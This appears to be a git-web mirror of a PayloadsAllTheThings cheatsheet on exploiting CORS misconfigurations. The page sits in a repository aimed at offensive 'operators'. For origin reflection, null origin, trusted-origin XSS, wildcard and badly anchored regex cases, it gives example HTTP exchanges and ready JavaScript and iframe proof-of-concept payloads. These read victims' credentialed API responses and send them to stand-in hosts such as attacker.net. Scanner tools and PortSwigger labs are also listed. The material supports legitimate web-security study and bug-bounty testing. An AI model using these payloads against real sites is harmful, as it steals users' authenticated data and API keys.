daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (10340B)


      1 ---
      2 title: "CORS Misconfiguration"
      3 topic: "CORS Misconfiguration"
      4 topicSlug: "cors-misconfiguration"
      5 sourcePath: "CORS Misconfiguration/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CORS%20Misconfiguration/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # CORS Misconfiguration
     12 
     13 > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker's site using the victim's credentials.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Requirements](#requirements)
     19 * [Methodology](#methodology)
     20     * [Origin Reflection](#origin-reflection)
     21     * [Null Origin](#null-origin)
     22     * [XSS on Trusted Origin](#xss-on-trusted-origin)
     23     * [Wildcard Origin without Credentials](#wildcard-origin-without-credentials)
     24     * [Expanding the Origin](#expanding-the-origin)
     25 * [Labs](#labs)
     26 * [References](#references)
     27 
     28 ## Tools
     29 
     30 * [s0md3v/Corsy](https://github.com/s0md3v/Corsy/) - CORS Misconfiguration Scanner
     31 * [chenjj/CORScanner](https://github.com/chenjj/CORScanner) - Fast CORS misconfiguration vulnerabilities scanner
     32 * [@honoki/PostMessage](https://tools.honoki.net/postmessage.html) - POC Builder
     33 * [trufflesecurity/of-cors](https://github.com/trufflesecurity/of-cors) - Exploit CORS misconfigurations on the internal networks
     34 * [omranisecurity/CorsOne](https://github.com/omranisecurity/CorsOne) - Fast CORS Misconfiguration Discovery Tool
     35 
     36 ## Requirements
     37 
     38 * BURP HEADER> `Origin: https://evil.com`
     39 * VICTIM HEADER> `Access-Control-Allow-Credential: true`
     40 * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
     41 
     42 ## Methodology
     43 
     44 Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
     45 
     46 ### Origin Reflection
     47 
     48 #### Vulnerable Implementation
     49 
     50 ```powershell
     51 GET /endpoint HTTP/1.1
     52 Host: victim.example.com
     53 Origin: https://evil.com
     54 Cookie: sessionid=... 
     55 
     56 HTTP/1.1 200 OK
     57 Access-Control-Allow-Origin: https://evil.com
     58 Access-Control-Allow-Credentials: true 
     59 
     60 {"[private API key]"}
     61 ```
     62 
     63 #### Proof Of Concept
     64 
     65 This PoC requires that the respective JS script is hosted at `evil.com`
     66 
     67 ```js
     68 var req = new XMLHttpRequest(); 
     69 req.onload = reqListener; 
     70 req.open('get','https://victim.example.com/endpoint',true); 
     71 req.withCredentials = true;
     72 req.send();
     73 
     74 function reqListener() {
     75     location='//attacker.net/log?key='+this.responseText; 
     76 };
     77 ```
     78 
     79 or
     80 
     81 ```html
     82 <html>
     83      <body>
     84          <h2>CORS PoC</h2>
     85          <div id="demo">
     86              <button type="button" onclick="cors()">Exploit</button>
     87          </div>
     88          <script>
     89              function cors() {
     90              var xhr = new XMLHttpRequest();
     91              xhr.onreadystatechange = function() {
     92                  if (this.readyState == 4 && this.status == 200) {
     93                  document.getElementById("demo").innerHTML = alert(this.responseText);
     94                  }
     95              };
     96               xhr.open("GET",
     97                        "https://victim.example.com/endpoint", true);
     98              xhr.withCredentials = true;
     99              xhr.send();
    100              }
    101          </script>
    102      </body>
    103  </html>
    104 ```
    105 
    106 ### Null Origin
    107 
    108 #### Vulnerable Implementation
    109 
    110 It's possible that the server does not reflect the complete `Origin` header but
    111 that the `null` origin is allowed. This would look like this in the server's
    112 response:
    113 
    114 ```ps1
    115 GET /endpoint HTTP/1.1
    116 Host: victim.example.com
    117 Origin: null
    118 Cookie: sessionid=... 
    119 
    120 HTTP/1.1 200 OK
    121 Access-Control-Allow-Origin: null
    122 Access-Control-Allow-Credentials: true 
    123 
    124 {"[private API key]"}
    125 ```
    126 
    127 #### Proof Of Concept
    128 
    129 This can be exploited by putting the attack code into an iframe using the data
    130 URI scheme. If the data URI scheme is used, the browser will use the `null`
    131 origin in the request:
    132 
    133 ```html
    134 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
    135   var req = new XMLHttpRequest();
    136   req.onload = reqListener;
    137   req.open('get','https://victim.example.com/endpoint',true);
    138   req.withCredentials = true;
    139   req.send();
    140 
    141   function reqListener() {
    142     location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
    143    };
    144 </script>"></iframe> 
    145 ```
    146 
    147 ### XSS on Trusted Origin
    148 
    149 If the application does implement a strict whitelist of allowed origins, the
    150 exploit codes from above do not work. But if you have an XSS on a trusted
    151 origin, you can inject the exploit coded from above in order to exploit CORS
    152 again.
    153 
    154 ```ps1
    155 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
    156 ```
    157 
    158 ### Wildcard Origin without Credentials
    159 
    160 If the server responds with a wildcard origin `*`, **the browser does never send
    161 the cookies**. However, if the server does not require authentication, it's still
    162 possible to access the data on the server. This can happen on internal servers
    163 that are not accessible from the Internet. The attacker's website can then
    164 pivot into the internal network and access the server's data without authentication.
    165 
    166 ```powershell
    167 * is the only wildcard origin
    168 https://*.example.com is not valid
    169 ```
    170 
    171 #### Vulnerable Implementation
    172 
    173 ```powershell
    174 GET /endpoint HTTP/1.1
    175 Host: api.internal.example.com
    176 Origin: https://evil.com
    177 
    178 HTTP/1.1 200 OK
    179 Access-Control-Allow-Origin: *
    180 
    181 {"[private API key]"}
    182 ```
    183 
    184 #### Proof Of Concept
    185 
    186 ```js
    187 var req = new XMLHttpRequest(); 
    188 req.onload = reqListener; 
    189 req.open('get','https://api.internal.example.com/endpoint',true); 
    190 req.send();
    191 
    192 function reqListener() {
    193     location='//attacker.net/log?key='+this.responseText; 
    194 };
    195 ```
    196 
    197 ### Expanding the Origin
    198 
    199 Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
    200 
    201 #### Vulnerable Implementation (Example 1)
    202 
    203 In this scenario any prefix inserted in front of `example.com` will be accepted by the server.
    204 
    205 ```ps1
    206 GET /endpoint HTTP/1.1
    207 Host: api.example.com
    208 Origin: https://evilexample.com
    209 
    210 HTTP/1.1 200 OK
    211 Access-Control-Allow-Origin: https://evilexample.com
    212 Access-Control-Allow-Credentials: true 
    213 
    214 {"[private API key]"}
    215 ```
    216 
    217 #### Proof of Concept (Example 1)
    218 
    219 This PoC requires the respective JS script to be hosted at `evilexample.com`
    220 
    221 ```js
    222 var req = new XMLHttpRequest(); 
    223 req.onload = reqListener; 
    224 req.open('get','https://api.example.com/endpoint',true); 
    225 req.withCredentials = true;
    226 req.send();
    227 
    228 function reqListener() {
    229     location='//attacker.net/log?key='+this.responseText; 
    230 };
    231 ```
    232 
    233 #### Vulnerable Implementation (Example 2)
    234 
    235 In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
    236 
    237 ```ps1
    238 GET /endpoint HTTP/1.1
    239 Host: api.example.com
    240 Origin: https://apiiexample.com
    241 
    242 HTTP/1.1 200 OK
    243 Access-Control-Allow-Origin: https://apiiexample.com
    244 Access-Control-Allow-Credentials: true 
    245 
    246 {"[private API key]"}
    247 ```
    248 
    249 #### Proof of concept (Example 2)
    250 
    251 This PoC requires the respective JS script to be hosted at `apiiexample.com`
    252 
    253 ```js
    254 var req = new XMLHttpRequest(); 
    255 req.onload = reqListener; 
    256 req.open('get','https://api.example.com/endpoint',true); 
    257 req.withCredentials = true;
    258 req.send();
    259 
    260 function reqListener() {
    261     location='//attacker.net/log?key='+this.responseText; 
    262 };
    263 ```
    264 
    265 ## Labs
    266 
    267 * [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
    268 * [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
    269 * [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
    270 * [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
    271 
    272 ## References
    273 
    274 * [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
    275 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
    276 * [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://web.archive.org/web/20250426222841/https://hackerone.com/reports/426147)
    277 * [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://web.archive.org/web/20190820201328/https://hackerone.com/reports/430249)
    278 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://web.archive.org/web/20171230084544/https://hackerone.com/reports/168574)
    279 * [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
    280 * [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors)
    281 * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200)
    282 * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - October 14, 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
    283 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
    284 * [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14, 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)